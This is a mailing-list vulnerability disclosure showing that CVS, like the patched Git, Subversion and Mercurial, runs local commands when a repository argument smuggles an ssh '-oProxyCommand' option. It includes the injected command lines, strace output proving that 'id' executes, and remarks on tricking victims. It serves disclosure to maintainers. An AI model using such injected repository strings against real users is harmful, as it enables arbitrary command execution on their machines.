Bugs in Git, Subversion, and Mercurial were just announced & patched which allowed arbitrary local command execution if a malicious name was used for the remote server, such as starting with - to pass options to the ssh client:
git clone ssh://-oProxyCommand=some-command... CVS has a similar problem with the -d option: $ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1 | egrep [^pu]id execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0 [snip] [pid 20003] execve("/usr/local/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */ ) = -1 ENOENT (No such file or directory) [pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0 [pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x32af5f10d0 /* 141 vars */) = 0 [pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0 ssh_exchange_identification: Connection closed by remote host Tested vanilla CVS 1.12.13, and Gentoo CVS 1.12.12-r11. Of course, the repo specification looks very odd, so tricking a victim may be harder than for SCM tools where it's prefixed by an ssh://, or masked behind a redirect, or submodule paths may be followed without user interaction. See also: https://marc.info/?l=oss-security&m=150241876103454&w=2 https://marc.info/?l=subversion-announce&m=150238900328980&w=2 https://marc.info/?l=git&m=150238802328673&w=2 https://subversion.apache.org/security/CVE-2017-9800-advisory.txt Thanks, -- Hank Leininger <hl...@korelogic.com> 5F6D DCC8 FF53 8093 EC39 127B 091E 7F7C E898 E86C
signature.asc
Description: Digital signature
_______________________________________________ Bug-cvs mailing list Bug-cvs@nongnu.org https://lists.nongnu.org/mailman/listinfo/bug-cvs